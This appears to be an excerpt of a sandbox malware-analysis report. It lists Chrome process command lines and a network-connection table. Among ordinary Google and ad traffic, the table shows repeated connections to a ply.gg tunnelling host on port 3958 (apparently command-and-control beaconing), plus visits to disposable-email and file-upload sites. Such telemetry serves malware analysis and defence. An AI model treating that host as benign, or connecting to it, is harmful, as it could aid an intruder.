"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=4892 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=5000 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=5152 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=5400 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=5328 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=5528 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=6112 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=6004 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=5644 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=5904 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=6040 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=5776 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=5852 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=6008 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=5716 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=4840 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=5208 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=5244 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=3988 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=5144 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=4980 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=5316 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=4076 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=4572 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=5384 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=6616 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=5356 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=5368 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=5584 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=5600 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=5616 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6892 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5840 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=6036 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=3756 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=5172 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=6988 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=2764 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --mojo-platform-channel-handle=4856 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --mojo-platform-channel-handle=4744 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=6832 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=6720 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=5968 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --mojo-platform-channel-handle=4840 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --mojo-platform-channel-handle=6560 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --mojo-platform-channel-handle=5428 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --mojo-platform-channel-handle=5860 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| GB | 142.250.200.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.179.238:443 | apis.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 142.250.200.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| US | 8.8.8.8:53 | consent.google.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.179.238:443 | apis.google.com | udp |
| GB | 172.217.16.238:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 172.217.16.238:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 172.217.16.238:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 172.217.16.238:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 172.217.16.238:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 172.217.16.238:443 | encrypted-tbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | 16.ip.gl.ply.gg | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | encrypted-vtbn0.gstatic.com | udp |
| GB | 142.250.180.14:443 | encrypted-vtbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| GB | 142.250.180.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | rr5---sn-4g5lznlz.googlevideo.com | udp |
| DE | 74.125.104.74:443 | rr5---sn-4g5lznlz.googlevideo.com | tcp |
| DE | 74.125.104.74:443 | rr5---sn-4g5lznlz.googlevideo.com | tcp |
| US | 8.8.8.8:53 | rr1---sn-4g5edndz.googlevideo.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| DE | 74.125.162.230:443 | rr1---sn-4g5edndz.googlevideo.com | udp |
| BE | 64.233.167.84:443 | accounts.google.com | tcp |
| BE | 64.233.167.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | rr4---sn-q4fl6nd6.googlevideo.com | udp |
| US | 173.194.24.233:443 | rr4---sn-q4fl6nd6.googlevideo.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.200.33:443 | yt3.ggpht.com | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 142.250.200.42:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.200.33:443 | yt3.ggpht.com | udp |
| US | 8.8.8.8:53 | yt3.googleusercontent.com | udp |
| GB | 142.250.178.1:443 | yt3.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | youtube.com | udp |
| GB | 142.250.178.14:443 | youtube.com | tcp |
| US | 8.8.8.8:53 | consent.youtube.com | udp |
| GB | 172.217.16.238:443 | consent.youtube.com | tcp |
| DE | 74.125.104.74:443 | rr5---sn-4g5lznlz.googlevideo.com | udp |
| US | 8.8.8.8:53 | rr4---sn-4g5lznle.googlevideo.com | udp |
| DE | 74.125.163.201:443 | rr4---sn-4g5lznle.googlevideo.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| FR | 216.58.201.98:443 | googleads.g.doubleclick.net | tcp |
| FR | 216.58.201.98:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 142.250.200.6:443 | static.doubleclick.net | tcp |
| FR | 216.58.201.98:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| GB | 172.217.169.35:443 | www.google.co.uk | tcp |
| GB | 142.250.178.14:443 | youtube.com | udp |
| US | 8.8.8.8:53 | suggestqueries-clients6.youtube.com | udp |
| GB | 142.250.200.46:443 | suggestqueries-clients6.youtube.com | tcp |
| GB | 142.250.200.46:443 | suggestqueries-clients6.youtube.com | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.213.67:443 | beacons.gcp.gvt2.com | tcp |
| FR | 216.58.213.67:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 216.58.213.14:443 | play.google.com | tcp |
| GB | 216.58.213.14:443 | play.google.com | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| GB | 216.58.212.238:443 | www.youtube.com | udp |
| GB | 216.58.212.238:443 | www.youtube.com | tcp |
| FR | 216.58.213.67:443 | beacons.gcp.gvt2.com | udp |
| BE | 64.233.167.84:443 | accounts.google.com | udp |
| BE | 64.233.167.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | e2c34.gcp.gvt2.com | udp |
| KR | 35.216.18.75:443 | e2c34.gcp.gvt2.com | tcp |
| KR | 35.216.18.75:443 | e2c34.gcp.gvt2.com | tcp |
| DE | 74.125.163.201:443 | rr4---sn-4g5lznle.googlevideo.com | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| DE | 172.217.16.131:443 | beacons.gvt2.com | tcp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| DE | 172.217.16.131:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | tcp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| FR | 216.58.201.98:443 | googleads.g.doubleclick.net | udp |
| GB | 216.58.212.238:443 | www.youtube.com | udp |
| BE | 64.233.167.84:443 | accounts.google.com | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.200.46:443 | suggestqueries-clients6.youtube.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.200.46:443 | suggestqueries-clients6.youtube.com | tcp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.180.22:443 | i.ytimg.com | udp |
| GB | 142.250.200.6:443 | static.doubleclick.net | udp |
| GB | 142.250.200.42:443 | jnn-pa.googleapis.com | udp |
| GB | 172.217.16.238:443 | consent.youtube.com | udp |
| US | 8.8.8.8:53 | yopmail.com | udp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.213.3:443 | beacons3.gvt2.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.200.46:443 | fundingchoicesmessages.google.com | tcp |
| GB | 142.250.200.46:443 | fundingchoicesmessages.google.com | udp |
| US | 8.8.8.8:53 | lh3.googleusercontent.com | udp |
| GB | 216.58.212.193:443 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | tcp |
| GB | 142.250.180.1:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | www.googletagservices.com | udp |
| US | 8.8.8.8:53 | s0.2mdn.net | udp |
| FR | 216.58.204.66:443 | www.googletagservices.com | tcp |
| GB | 142.250.187.198:443 | s0.2mdn.net | tcp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | dsum-sec.casalemedia.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 172.64.151.101:443 | dsum-sec.casalemedia.com | tcp |
| GB | 142.250.200.34:443 | cm.g.doubleclick.net | tcp |
| GB | 142.250.200.34:443 | cm.g.doubleclick.net | tcp |
| NL | 185.89.210.153:443 | ib.adnxs.com | tcp |
| GB | 142.250.187.198:443 | s0.2mdn.net | udp |
| US | 8.8.8.8:53 | googleads4.g.doubleclick.net | udp |
| US | 172.64.151.101:443 | dsum-sec.casalemedia.com | tcp |
| NL | 185.89.210.153:443 | ib.adnxs.com | tcp |
| GB | 142.250.200.34:443 | googleads4.g.doubleclick.net | udp |
| US | 147.185.221.16:3958 | 16.ip.gl.ply.gg | tcp |
| US | 8.8.8.8:53 | imasdk.googleapis.com | udp |
| GB | 172.217.16.234:443 | imasdk.googleapis.com | tcp |
| GB | 172.217.16.234:443 | imasdk.googleapis.com | tcp |
| US | 8.8.8.8:53 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | bid.g.doubleclick.net | udp |
| DE | 142.250.185.227:443 | csi.gstatic.com | tcp |
| DE | 142.250.185.227:443 | csi.gstatic.com | tcp |
| BE | 74.125.71.157:443 | bid.g.doubleclick.net | tcp |
| US | 172.64.151.101:443 | dsum-sec.casalemedia.com | udp |
| DE | 142.250.185.227:443 | csi.gstatic.com | udp |
| US | 8.8.8.8:53 | unified.adsafeprotected.com | udp |
| IE | 34.242.41.121:443 | unified.adsafeprotected.com | tcp |
| US | 8.8.8.8:53 | gcdn.2mdn.net | udp |
| GB | 142.250.180.14:443 | gcdn.2mdn.net | tcp |
| US | 8.8.8.8:53 | r3---sn-4g5edn6r.c.2mdn.net | udp |
| DE | 74.125.153.200:443 | r3---sn-4g5edn6r.c.2mdn.net | tcp |
| DE | 74.125.153.200:443 | r3---sn-4g5edn6r.c.2mdn.net | udp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| GB | 87.98.250.141:443 | yopmail.com | tcp |
| US | 8.8.8.8:53 | ade.googlesyndication.com | udp |
| US | 8.8.8.8:53 | www.filemail.com | udp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| US | 8.8.8.8:53 | analytics.filemail.com | udp |
| NL | 20.82.124.160:443 | analytics.filemail.com | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| GB | 172.217.169.35:443 | www.google.co.uk | udp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| US | 8.8.8.8:53 | 3002.filemail.com | udp |
| NO | 193.30.119.102:443 | 3002.filemail.com | tcp |
| NO | 193.30.119.102:443 | 3002.filemail.com | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| NL | 178.21.23.181:443 | www.filemail.com | tcp |
| US | 8.8.8.8:53 | widget.intercom.io | udp |
